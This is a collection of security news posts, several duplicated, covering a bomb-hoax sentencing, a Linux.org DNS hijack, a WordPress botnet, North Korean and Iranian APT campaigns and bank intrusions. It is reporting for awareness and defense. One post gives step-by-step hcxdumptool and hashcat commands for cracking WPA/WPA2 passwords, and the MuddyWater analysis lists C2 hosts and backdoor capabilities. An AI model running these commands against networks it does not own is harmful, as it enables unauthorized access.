 4. Never leave your device unattended in public—While many threats exist online, you still have to be aware of real-world threats, like someone grabbing your device when you’re not looking. Keep your smartphone on you, or within view, while in public.

If you have a “phone visibility” option, turn it off. This setting allows nearby devices to see your phone and exchange data with it.

5. Stay aware—New mobile threats are emerging all the time. Keep up on the latest scams and warning signs, so you know what to look out for.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Tell If Your Smartphone Has Been Hacked appeared first on McAfee Blogs.



McAfee Blogs

Security Affairs: Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS

The British teenager George Duke-Cohan (19) has been sentenced to three years in prison due to false bomb threats and carrying out DDoS attacks.A

Cohan was arrested in August by the U.K. National Crime Agency (NCA), the teenager, aka “7R1D3N7,” “DoubleParallax” and “optcz1,” was arrested on August 31 and pleaded guilty to three counts of making hoax bomb threats.

According to the investigator, the young man is the leader of the Apophis Squad, which is the hacking group that sent bomb threats to thousands of schools in the United Kingdom and the United States.

The group is also known for launching massive DDoS attacks against encrypted email provider ProtonMail, the popular investigator Brian Krebs, the DEF CON hacking conference, and government agencies worldwide.

The team was offering a DDoS-for-hire service that has many similarities with the booter implemented by the popular Lizard Squad hacking crew.

He has admitted making bomb threats to thousands of schools and a United Airlines flight traveling from the UK to San Francisco in August. in many cases resulting in evacuations. 
The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

Cohan has now been sentenced to one year in prison for the bomb hoaxes targeting schools, and two years for the airport attack.

Unfortunately for the British youngster, he will face additional charges in the United States, even if the indictment has yet to be announced.

Before sentencing, the judge noted that Duke-Cohan’s early guilty pleas, his age, no prior criminal record and, to a limited extent, his “functioning deficiencies which have contributed to a diagnosis of autism,” were taken into consideration. However, these mitigating factors only helped his case to a certain degree.

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow.” said Judge Richard Foster

“You were playing a cat-and-mouse game with the authorities. You were playing a game for your own perverted sense of fun in full knowledge of the consequences.”

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow,” Judge Richard Foster said, quoted by the Daily Mail. “What you did was far removed from anything that could be described as naivety or a cry for help from a sick person.”

Pierluigi Paganini

(Security Affairs – cybercrime, DDoS)

The post Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS appeared first on Security Affairs.



Security Affairs

Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS

The British teenager George Duke-Cohan (19) has been sentenced to three years in prison due to false bomb threats and carrying out DDoS attacks.A

Cohan was arrested in August by the U.K. National Crime Agency (NCA), the teenager, aka “7R1D3N7,” “DoubleParallax” and “optcz1,” was arrested on August 31 and pleaded guilty to three counts of making hoax bomb threats.

According to the investigator, the young man is the leader of the Apophis Squad, which is the hacking group that sent bomb threats to thousands of schools in the United Kingdom and the United States.

The group is also known for launching massive DDoS attacks against encrypted email provider ProtonMail, the popular investigator Brian Krebs, the DEF CON hacking conference, and government agencies worldwide.

The team was offering a DDoS-for-hire service that has many similarities with the booter implemented by the popular Lizard Squad hacking crew.

He has admitted making bomb threats to thousands of schools and a United Airlines flight traveling from the UK to San Francisco in August. in many cases resulting in evacuations. 
The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

Cohan has now been sentenced to one year in prison for the bomb hoaxes targeting schools, and two years for the airport attack.

Unfortunately for the British youngster, he will face additional charges in the United States, even if the indictment has yet to be announced.

Before sentencing, the judge noted that Duke-Cohan’s early guilty pleas, his age, no prior criminal record and, to a limited extent, his “functioning deficiencies which have contributed to a diagnosis of autism,” were taken into consideration. However, these mitigating factors only helped his case to a certain degree.

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow.” said Judge Richard Foster

“You were playing a cat-and-mouse game with the authorities. You were playing a game for your own perverted sense of fun in full knowledge of the consequences.”

“You knew exactly what you were doing and why you were doing it, and you knew full well the havoc that would follow,” Judge Richard Foster said, quoted by the Daily Mail. “What you did was far removed from anything that could be described as naivety or a cry for help from a sick person.”

Pierluigi Paganini

(Security Affairs – cybercrime, DDoS)

The post Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS appeared first on Security Affairs.

Security Affairs: Expert devised a new WiFi hack that works on WPA/WPA2

The popular expert Jens ‘Atom’ Steube devised a new WiFi hack that allows cracking WiFi passwords of most modern routers.

Jens ‘Atom’ Steube, the lead developer of the popular password-cracking tool Hashcat, has developed a new WiFi hacking technique that allows cracking WiFi passwords of most modern routers.

Jens ‘Atom’ Steube, the lead developer of the popular password-cracking tool Hashcat, has developed a new WiFi hacking technique that allows cracking WiFi passwords of most modern routers.

The attack technique works against WPA/WPA2 wireless network protocols with Pairwise Master Key Identifier (PMKID)-based roaming features enabled.

Steube discovered the attack while he was analyzing the WPA3 security standard.

The technique allows an attacker to recover the Pre-shared Key (PSK) login passwords and use them to hack into your Wi-Fi network and eavesdrop on the Internet traffic.

wifi hack

Unlike other WiFi hacking techniques, this attack doesn’t require the capture of a full 4-way authentication handshake of EAPOL.

Instead, the new WiFi hack is performed on the RSN IE (Robust Security Network Information Element) using a single EAPOL (Extensible Authentication Protocol over LAN) frame after requesting it from the access point.

“This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).”

“The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame”

The Robust Security Network protocol allows establishing secure communications over an 802.11 wireless network. It uses the PMKID key to establish a connection between a client and an access point.

Below the attack step by step:

Step 1 — Run hcxdumptool to request the PMKID from the Access Point and to dump the received frame to a file (in pcapng format).

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status

Step 2 — Run hcxpcaptool tool to convert the captured data from pcapng format to a hash format that is accepted by Hashcat.

$ ./hcxpcaptool -z test.16800 test.pcapng

Step 3 — Launch the Hashcat (v4.2.0 or higher) password cracking tool and crack it. The hash-mode that we need to use is 16800.

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

In this way it is possible to retrieve the password of the target WiFi networt.

“At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).” 
Steube concludes.

“The main advantages of this attack are as follow:

  • No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string”.

Pierluigi Paganini

(Security Affairs – WiFi hack, hacking)

The post Expert devised a new WiFi hack that works on WPA/WPA2 appeared first on Security Affairs.



Security Affairs

Expert devised a new WiFi hack that works on WPA/WPA2

The popular expert Jens ‘Atom’ Steube devised a new WiFi hack that allows cracking WiFi passwords of most modern routers.

Jens ‘Atom’ Steube, the lead developer of the popular password-cracking tool Hashcat, has developed a new WiFi hacking technique that allows cracking WiFi passwords of most modern routers.

Jens ‘Atom’ Steube, the lead developer of the popular password-cracking tool Hashcat, has developed a new WiFi hacking technique that allows cracking WiFi passwords of most modern routers.

The attack technique works against WPA/WPA2 wireless network protocols with Pairwise Master Key Identifier (PMKID)-based roaming features enabled.

Steube discovered the attack while he was analyzing the WPA3 security standard.

The technique allows an attacker to recover the Pre-shared Key (PSK) login passwords and use them to hack into your Wi-Fi network and eavesdrop on the Internet traffic.

wifi hack

Unlike other WiFi hacking techniques, this attack doesn’t require the capture of a full 4-way authentication handshake of EAPOL.

Instead, the new WiFi hack is performed on the RSN IE (Robust Security Network Information Element) using a single EAPOL (Extensible Authentication Protocol over LAN) frame after requesting it from the access point.

“This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).”

“The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame”

The Robust Security Network protocol allows establishing secure communications over an 802.11 wireless network. It uses the PMKID key to establish a connection between a client and an access point.

Below the attack step by step:

Step 1 — Run hcxdumptool to request the PMKID from the Access Point and to dump the received frame to a file (in pcapng format).

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status

Step 2 — Run hcxpcaptool tool to convert the captured data from pcapng format to a hash format that is accepted by Hashcat.

$ ./hcxpcaptool -z test.16800 test.pcapng

Step 3 — Launch the Hashcat (v4.2.0 or higher) password cracking tool and crack it. The hash-mode that we need to use is 16800.

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

In this way it is possible to retrieve the password of the target WiFi networt.

“At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).” 
Steube concludes.

“The main advantages of this attack are as follow:

  • No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string”.

Pierluigi Paganini

(Security Affairs – WiFi hack, hacking)

The post Expert devised a new WiFi hack that works on WPA/WPA2 appeared first on Security Affairs.

Hackers defaced Linux.org with DNS hijack

The Linux.org website was defaced last week via DNS hijack, attackers breached into associated registrar account and changed the DNS settings.

Attackers changed the defacement page a few times, they protested against the new Linux kernel developer code of conduct in a regrettable way with 
racial slurs and the image of an individual showing the anus.

linux.org-community-defacement

The defacement page also includes links and a Twitter account (@kitlol5) believed to be under the control of the attacker.

The person who was operating the Twitter account posted a screenshot showing that they had access to the Network Solutions account of Michelle McLagan, who evidently owns linux.org, and modified the DNS settings.

“This evening someone got into my partner’s netsol account and pointed linux.org DNS to their own cloudflare account. The production env (web / db) wasn’t touched. DNS was simply pointing to another box.” 
one of the Linux.org admins
wrote on Reddit.

“She’s working with netsol to prove ownership, etc.. and we’re hoping things will be cleared up in the morning.”

The hacker did not access the servers hosting Linux.org and user data were not compromised.

How to prevent this kind of incident?

Administrators should enable multi-factor authentication (MFA) for their account.

“I think it was a combination of public whois info and no MFA that lead to this,” added the Linux.org admin.

“There’s always one thing – they found the weakest link and exploited it.”

After the incident, admins have enabled MFA on all accounts.

Pierluigi Paganini

(Security Affairs – DNS hijack, hacking)

The post Hackers defaced Linux.org with DNS hijack appeared first on Security Affairs.

WordPress botnet composed of +20k installs targets other sites

Experts from security firm Wordfence discovered a Botnet of 20,000 WordPress Sites Infecting other WordPress installs.

Experts from security firm Wordfence uncovered a botnet composed of over 20,000 WordPress sites that is being used to compromise other websites running on the popular CMS and recruit them.  

“The threat actors (hackers) use a group of four command and control (C2) servers to send requests to over 14,000 proxy servers provided by a Russian proxy provider called best-proxies[.]ru.” reads the analysis published by WordFence.

“They use these proxies to anonymize the C2 traffic. The requests pass through the proxy servers and are sent to over 20,000 infected WordPress sites. Those sites are running an attack script which attacks targeted WordPress sites.”

The botnet is used by attackers to carry out brute force attacks against other WordPress sites, according to Wordfence Defiant Threat Intelligence team, the botnet has already generated over 5 million authentication requests. The botnet attempts XML-RPC authentication to other WordPress sites in order to access privileged accounts.

The XML-RPC interface allows users to remotely post content to a WordPress site using the WordPress or other APIs, it is located in the root directory of a WordPress install at the xmlrpc.php file.

Unfortunately, the XML-RPC interface doesn’t implement a rate limiting on the number of API requests that it is possible to submit, a gift for brute-force attackers. 

A close look at the malicious infrastructure allowed the experts to discover that hackers used four command and control servers that issue commands to the bots through proxy servers at the Russian Best-Proxies.ru service.  Experts identified over 14,000 proxy servers used by the botmaster to anonymize the traffic.

Once a WordPress site is compromised it will start carrying out brute force attacks against the XML-RPC interface of other websites. 

“We also noted that the User-Agent strings associated with these requests matched those used by applications commonly seen interacting with the XML-RPC interface, like wp-iphone and wp-android,” continues the analysis.

“Since these applications typically store credentials locally, it was unusual to see a significant amount of failed logins from them, which drew our attention. We identified over 20,000 WordPress slave sites that were attacking other WordPress sites.”

Brute force scripts used by the attackers accept POST input from the C2 servers, the request includes domains to target and word lists to use when performing the brute force attacks.

It is also possible to use new wordlists by providing URL to the script.

Wordfence reported its discovery to the authorities and is helping them to dismantle the WordPress botnet.

Pierluigi Paganini

(Security Affairs –WordPress Botnet, hacking)

The post WordPress botnet composed of +20k installs targets other sites appeared first on Security Affairs.

Security Affairs: WordPress botnet composed of +20k installs targets other sites

Experts from security firm Wordfence discovered a Botnet of 20,000 WordPress Sites Infecting other WordPress installs.

Experts from security firm Wordfence uncovered a botnet composed of over 20,000 WordPress sites that is being used to compromise other websites running on the popular CMS and recruit them.  

“The threat actors (hackers) use a group of four command and control (C2) servers to send requests to over 14,000 proxy servers provided by a Russian proxy provider called best-proxies[.]ru.” reads the analysis published by WordFence.

“They use these proxies to anonymize the C2 traffic. The requests pass through the proxy servers and are sent to over 20,000 infected WordPress sites. Those sites are running an attack script which attacks targeted WordPress sites.”

The botnet is used by attackers to carry out brute force attacks against other WordPress sites, according to Wordfence Defiant Threat Intelligence team, the botnet has already generated over 5 million authentication requests. The botnet attempts XML-RPC authentication to other WordPress sites in order to access privileged accounts.

The XML-RPC interface allows users to remotely post content to a WordPress site using the WordPress or other APIs, it is located in the root directory of a WordPress install at the xmlrpc.php file.

Unfortunately, the XML-RPC interface doesn’t implement a rate limiting on the number of API requests that it is possible to submit, a gift for brute-force attackers. 

A close look at the malicious infrastructure allowed the experts to discover that hackers used four command and control servers that issue commands to the bots through proxy servers at the Russian Best-Proxies.ru service.  Experts identified over 14,000 proxy servers used by the botmaster to anonymize the traffic.

Once a WordPress site is compromised it will start carrying out brute force attacks against the XML-RPC interface of other websites. 

“We also noted that the User-Agent strings associated with these requests matched those used by applications commonly seen interacting with the XML-RPC interface, like wp-iphone and wp-android,” continues the analysis.

“Since these applications typically store credentials locally, it was unusual to see a significant amount of failed logins from them, which drew our attention. We identified over 20,000 WordPress slave sites that were attacking other WordPress sites.”

Brute force scripts used by the attackers accept POST input from the C2 servers, the request includes domains to target and word lists to use when performing the brute force attacks.

It is also possible to use new wordlists by providing URL to the script.

Wordfence reported its discovery to the authorities and is helping them to dismantle the WordPress botnet.

Pierluigi Paganini

(Security Affairs –WordPress Botnet, hacking)

The post WordPress botnet composed of +20k installs targets other sites appeared first on Security Affairs.



Security Affairs

STOLEN PENCIL campaign, hackers target academic institutions.

STOLEN PENCIL campaign – North Korea-linked APT group has been targeting academic institutions since at least May of this year.

North Korea-linked threat actors are targeting academic institutions with spear phishing attacks. The phishing messages include a link to a website where a decoy document that attempts to trick users into installing a malicious Google Chrome extension. 
Many of the victims of this campaign, tracked as STOLEN PENCIL, were at multiple universities had expertise in biomedical engineering. 

Attackers ensure persistence using off-the-shelf tools, but according to NetScout they had poor OPSEC (i.e. Korean keyboards, open web browsers in Korean, English-to-Korean translators).

“The ultimate motivation behind the attacks is unclear, but the threat actors are adept at scavenging for credentials. Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension.” reads the analysis published by the experts.

“Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access.”

Threat actors used many basic phishing pages, the more sophisticated of them targeted academia display a benign PDF in an IFRAME and redirected users to a “Font Manager” extension from the Chrome Web Store.

The malicious extension loads JavaScript from a separate site, experts only found a file containing legitimate jQuery code, likely because the threat actors replaced the malicious code to make hard the analysis. The malicious extension allows the attacker to read data from all the websites accessed by the victim, a circumstance that suggests attackers were looking to steal browser cookies and passwords. 

Experts pointed out that the attackers did not use a malware to compromise the targets, the STOLEN PENCIL attackers employed RDP to access the compromised systems, researchers observed remote access occurring daily from 06:00 to 09:00 UTC (01:00-04:00 EST).

STOLEN PENCIL attackers also used a compromised or stolen certificate to sign several PE files used in the campaign. The researchers observed two signed sets of tools, dubbed MECHANICAL and GREASE. The former logs keystrokes and replaces an Ethereum wallet address with the attackers’ ones, the latter adds a Windows administrator account to the system and would also enable RDP.

The security researchers also discovered a ZIP archive containing tools for port scanning, memory and password dumping, and other hacking activities. The list of the tools include KPortScan, PsExec, batch files for enabling RDP, Procdump, Mimikatz, the Eternal suite of exploits, and Nirsoft tools such as Mail PassView, Network Password Recovery, Remote Desktop PassView, SniffPass, and WebBrowserPassView.

The STOLEN PENCIL campaign likely represents only a small set of the threat actor’s activity. The use of basic techniques, off-the-shelf programs, the aforementioned cryptojacker, and the use of Korean language suggests the actor is of North Korean origin, the security researchers say. 

“While we were able to gain insight into the threat actor’s TTPs (Tools, Techniques, & Procedures) behind STOLEN PENCIL, this is clearly just a small window into their activity. Their techniques are relatively basic, and much of their toolset consists of off-the-shelf programs and living off the land. ” NetScout concludes. 

“This, along with the presence of the cryptojacker, is typical of DPRK tradecraft.  Additionally, the operators’ poor OPSEC exposes their Korean language, in both viewed websites and keyboard selections.” 

Pierluigi Paganini

(Security Affairs – STOLEN PENCIL, hacking)

The post STOLEN PENCIL campaign, hackers target academic institutions. appeared first on Security Affairs.

Security Affairs: STOLEN PENCIL campaign, hackers target academic institutions.

STOLEN PENCIL campaign – North Korea-linked APT group has been targeting academic institutions since at least May of this year.

North Korea-linked threat actors are targeting academic institutions with spear phishing attacks. The phishing messages include a link to a website where a decoy document that attempts to trick users into installing a malicious Google Chrome extension. 
Many of the victims of this campaign, tracked as STOLEN PENCIL, were at multiple universities had expertise in biomedical engineering. 

Attackers ensure persistence using off-the-shelf tools, but according to NetScout they had poor OPSEC (i.e. Korean keyboards, open web browsers in Korean, English-to-Korean translators).

“The ultimate motivation behind the attacks is unclear, but the threat actors are adept at scavenging for credentials. Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension.” reads the analysis published by the experts.

“Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access.”

Threat actors used many basic phishing pages, the more sophisticated of them targeted academia display a benign PDF in an IFRAME and redirected users to a “Font Manager” extension from the Chrome Web Store.

The malicious extension loads JavaScript from a separate site, experts only found a file containing legitimate jQuery code, likely because the threat actors replaced the malicious code to make hard the analysis. The malicious extension allows the attacker to read data from all the websites accessed by the victim, a circumstance that suggests attackers were looking to steal browser cookies and passwords. 

Experts pointed out that the attackers did not use a malware to compromise the targets, the STOLEN PENCIL attackers employed RDP to access the compromised systems, researchers observed remote access occurring daily from 06:00 to 09:00 UTC (01:00-04:00 EST).

STOLEN PENCIL attackers also used a compromised or stolen certificate to sign several PE files used in the campaign. The researchers observed two signed sets of tools, dubbed MECHANICAL and GREASE. The former logs keystrokes and replaces an Ethereum wallet address with the attackers’ ones, the latter adds a Windows administrator account to the system and would also enable RDP.

The security researchers also discovered a ZIP archive containing tools for port scanning, memory and password dumping, and other hacking activities. The list of the tools include KPortScan, PsExec, batch files for enabling RDP, Procdump, Mimikatz, the Eternal suite of exploits, and Nirsoft tools such as Mail PassView, Network Password Recovery, Remote Desktop PassView, SniffPass, and WebBrowserPassView.

The STOLEN PENCIL campaign likely represents only a small set of the threat actor’s activity. The use of basic techniques, off-the-shelf programs, the aforementioned cryptojacker, and the use of Korean language suggests the actor is of North Korean origin, the security researchers say. 

“While we were able to gain insight into the threat actor’s TTPs (Tools, Techniques, & Procedures) behind STOLEN PENCIL, this is clearly just a small window into their activity. Their techniques are relatively basic, and much of their toolset consists of off-the-shelf programs and living off the land. ” NetScout concludes. 

“This, along with the presence of the cryptojacker, is typical of DPRK tradecraft.  Additionally, the operators’ poor OPSEC exposes their Korean language, in both viewed websites and keyboard selections.” 

Pierluigi Paganini

(Security Affairs – STOLEN PENCIL, hacking)

The post STOLEN PENCIL campaign, hackers target academic institutions. appeared first on Security Affairs.



Security Affairs

Banks Attacked through Malicious Hardware Connected to the Local Network

Kaspersky is reporting on a series of bank hacks -- called DarkVishnya -- perpetrated through malicious hardware being surreptitiously installed into the target network:

In 2017-2018, Kaspersky Lab specialists were invited to research a series of cybertheft incidents. Each attack had a common springboard: an unknown device directly connected to the company's local network. In some cases, it was the central office, in others a regional office, sometimes located in another country. At least eight banks in Eastern Europe were the targets of the attacks (collectively nicknamed DarkVishnya), which caused damage estimated in the tens of millions of dollars.

Each attack can be divided into several identical stages. At the first stage, a cybercriminal entered the organization's building under the guise of a courier, job seeker, etc., and connected a device to the local network, for example, in one of the meeting rooms. Where possible, the device was hidden or blended into the surroundings, so as not to arouse suspicion.

The devices used in the DarkVishnya attacks varied in accordance with the cybercriminals' abilities and personal preferences. In the cases we researched, it was one of three tools:

  • netbook or inexpensive laptop
  • Raspberry Pi computer
  • Bash Bunny, a special tool for carrying out USB attacks

Inside the local network, the device appeared as an unknown computer, an external flash drive, or even a keyboard. Combined with the fact that Bash Bunny is comparable in size to a USB flash drive, this seriously complicated the search for the entry point. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem.

Slashdot thread.

Security Affairs: Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain

Malware researchers at Yoroi – Cybaze Z-Lab analyzed the MuddyWater Infection Chain observed in a last wave of cyber attacks.

Introduction

At the end of November, some Middle East countries have been targeted by a new wave of attacks related to the Iranian APT group known as “MuddyWater“: their first campaign was observed back in 2017 and more recently Unit42 researchers reported attacks in the ME area. The MuddyWater’s TTPs seem to be quite invariant during this time-period: they keep using spear-phishing emails containing blurred document in order to induce the target to enable the execution of VB-macro code, to infect the host with POWERSTAT malware.

Figure 1. Malicious document

According to the analysis of ClearSky Research Team and TrendMicro researchers, at the end of November, MuddyWater group hit Lebanon and Oman institutions and after a few days Turkish entities. The attack vector and the final payload of were the same: the usual macro-embedded document and the POWERSTAT backdoor respectively.

However, the intermediate stages were slightly different than usual.

The Yoroi-Cybaze Zlab researchers analyzed the file “Cv.doc”, the blurred resume used by MuddyWater during their Lebanon/Oman campaign.

Technical Analysis

When the victim enables the MACRO execution, the malicious code creates an Excel document containing the necessary code to download the next-stage of the malicious implant. At the same time, it shows a fake error popup saying the Office version is incompatible.

Figure 2. Fake error message

The macro code is decrypted before the execution with the following custom routine:

Figure 3. Macro decryption routine

After the deobfuscation of the code, it’s possible to identify the function used to create the hidden Excel document within the “x1” variable:

Figure 4. Creation of the hidden document

The macro placed into the new Excel downloads powershell code from an URL apparently referencing a PNG image file “http://pazazta[.]com/app/icon.png”. The downloaded payload is able to create three new local files:

  • C:\Windows\Temp\temp.jpg, containing Javascript code;
  • C:\Windows\Temp\Windows.vbe, containing an encoded Visual Basic script;
  • C:\ProgramData\Microsoft.db, containing the encrypted final payload.
Figure 5. Downloaded Powershell code

As shown in the above figure, the first file to be executed is “Windows.vbe” which simply run the Javascript code contained into temp.jpg, using the CSCRIPT engine. After its decryption, it is possible to notice the JS purpose: delay the execution of another powershell payload.

Figure 6. Javascript code within “temp.jpg”

In fact, the next malicious stage is executed only when the “Math.round(ss) % 20 == 19” condition is met, otherwise it keeps re-executing itself. The “ss” variable stores the past seconds since 1 January 1970 00:00:00.

The final stage consists in the execution of the POWERSTATS backdoor contained into the “Microsoft.db” file. The backdoor contacts a couple of domain names: “hxxp://amphira[.com” and “hxxps://amorenvena[.com”, each one pointing to the same ip address 139.162.245.200 (EU-LINODE-20141229 US).

Figure 7. POWERSTAT beaconing requests

One executed, the POWERSTAT malware sends generic information about the victim’s machine to the remote server through an encoded HTTP POST request:

Figure 8. Post request containing info about the victim machine

Then, it starts its communication protocol with the C2, asking for commands to execute on the compromised host.

The HTTP parameter “type” classifies the kind request performed by the malicious implant, during the analysis the following values have been observed:

  • info: used in POST request to send info about the victim;
  • live: used in POST request as ping mechanism;
  • cmd: used both in POST and GET requests. In the first case it sends the last command executed, in the second one it retrieves a new command from server;
  • res: used in a POST request to send the result of the last command that the malware has executed.

The parameter “id”, instead, uniquely identify the victim machine and it is calculated using the local system info, despite the sample analyzed by TrendMicro which uses only the hard drive serial number.  This identifier is also used to create a file into the “C:\ProgramData\” folder, used to store temporary information.

Figure 9. Victim id creation

Analyzing the code extracted and deobfuscated from the “Microsoft.db” file, it is possible to investigate the real capabilities of the POWERSTATS backdoor, identifying the functionalities supported by a malicious implant, such as:

  • upload: the malware downloads a new file from the specified URL;
  • cmd: the malware executes the specified command;
  • b64: the malware decodes and executes a base64 PowerShell script;
  • muddy: the malware creates a new encrypted file in “C:\\ProgramData\LSASS” containing a powershell script and runs it.
Figure 10. Deobfuscated POWERSTATS code snippet

Persistence

The malware implements more than one persistence mechanism. These mechanisms are triggered only in the final stage of the infection, once the POWERSTATS backdoor is executed. The persistence functionalities use simple and known techniques such as redundant registry keys within the “Microsoft\Windows\CurrentVerison\Run” location:

Figure 11. Registry key based persistence mechanism

And the creation of a scheduled task named “MicrosoftEdge”, started every day at 12 o’clock.

Figure 12. Scheduled task installed by the malware

Conclusion

This last campaign of the Iranian ATP group “MuddyWater“ shows a clear example of how hacking groups can leverage system’s tools and scripting languages to achieve their objectives, maintain a foothold within their target hosts and exfiltrate data. These attacks also leverage macro-embedded document as the initial vector, showing how this “well-known” technique can still represent a relevant threat, especially if carefully prepared and contextualized to lure specific victims.

Figure 13.  MuddyWaters’ Infection chain 

Technical details, including Indicator of compromise and Yara rules are reported in the analysis published on the Yoroi blog.https://blog.yoroi.company/research/dissecting-the-muddywater-infection-chain/

Pierluigi Paganini

(Security Affairs – MuddyWater, APT)

The post Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain appeared first on Security Affairs.



Security Affairs

Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain

Malware researchers at Yoroi – Cybaze Z-Lab analyzed the MuddyWater Infection Chain observed in a last wave of cyber attacks.

Introduction

At the end of November, some Middle East countries have been targeted by a new wave of attacks related to the Iranian APT group known as “MuddyWater“: their first campaign was observed back in 2017 and more recently Unit42 researchers reported attacks in the ME area. The MuddyWater’s TTPs seem to be quite invariant during this time-period: they keep using spear-phishing emails containing blurred document in order to induce the target to enable the execution of VB-macro code, to infect the host with POWERSTAT malware.

Figure 1. Malicious document

According to the analysis of ClearSky Research Team and TrendMicro researchers, at the end of November, MuddyWater group hit Lebanon and Oman institutions and after a few days Turkish entities. The attack vector and the final payload of were the same: the usual macro-embedded document and the POWERSTAT backdoor respectively.

However, the intermediate stages were slightly different than usual.

The Yoroi-Cybaze Zlab researchers analyzed the file “Cv.doc”, the blurred resume used by MuddyWater during their Lebanon/Oman campaign.

Technical Analysis

When the victim enables the MACRO execution, the malicious code creates an Excel document containing the necessary code to download the next-stage of the malicious implant. At the same time, it shows a fake error popup saying the Office version is incompatible.

Figure 2. Fake error message

The macro code is decrypted before the execution with the following custom routine:

Figure 3. Macro decryption routine

After the deobfuscation of the code, it’s possible to identify the function used to create the hidden Excel document within the “x1” variable:

Figure 4. Creation of the hidden document

The macro placed into the new Excel downloads powershell code from an URL apparently referencing a PNG image file “http://pazazta[.]com/app/icon.png”. The downloaded payload is able to create three new local files:

  • C:\Windows\Temp\temp.jpg, containing Javascript code;
  • C:\Windows\Temp\Windows.vbe, containing an encoded Visual Basic script;
  • C:\ProgramData\Microsoft.db, containing the encrypted final payload.
Figure 5. Downloaded Powershell code

As shown in the above figure, the first file to be executed is “Windows.vbe” which simply run the Javascript code contained into temp.jpg, using the CSCRIPT engine. After its decryption, it is possible to notice the JS purpose: delay the execution of another powershell payload.

Figure 6. Javascript code within “temp.jpg”

In fact, the next malicious stage is executed only when the “Math.round(ss) % 20 == 19” condition is met, otherwise it keeps re-executing itself. The “ss” variable stores the past seconds since 1 January 1970 00:00:00.

The final stage consists in the execution of the POWERSTATS backdoor contained into the “Microsoft.db” file. The backdoor contacts a couple of domain names: “hxxp://amphira[.com” and “hxxps://amorenvena[.com”, each one pointing to the same ip address 139.162.245.200 (EU-LINODE-20141229 US).

Figure 7. POWERSTAT beaconing requests

One executed, the POWERSTAT malware sends generic information about the victim’s machine to the remote server through an encoded HTTP POST request:

Figure 8. Post request containing info about the victim machine

Then, it starts its communication protocol with the C2, asking for commands to execute on the compromised host.

The HTTP parameter “type” classifies the kind request performed by the malicious implant, during the analysis the following values have been observed:

  • info: used in POST request to send info about the victim;
  • live: used in POST request as ping mechanism;
  • cmd: used both in POST and GET requests. In the first case it sends the last command executed, in the second one it retrieves a new command from server;
  • res: used in a POST request to send the result of the last command that the malware has executed.

The parameter “id”, instead, uniquely identify the victim machine and it is calculated using the local system info, despite the sample analyzed by TrendMicro which uses only the hard drive serial number.  This identifier is also used to create a file into the “C:\ProgramData\” folder, used to store temporary information.

Figure 9. Victim id creation

Analyzing the code extracted and deobfuscated from the “Microsoft.db” file, it is possible to investigate the real capabilities of the POWERSTATS backdoor, identifying the functionalities supported by a malicious implant, such as:

  • upload: the malware downloads a new file from the specified URL;
  • cmd: the malware executes the specified command;
  • b64: the malware decodes and executes a base64 PowerShell script;
  • muddy: the malware creates a new encrypted file in “C:\\ProgramData\LSASS” containing a powershell script and runs it.
Figure 10. Deobfuscated POWERSTATS code snippet

Persistence

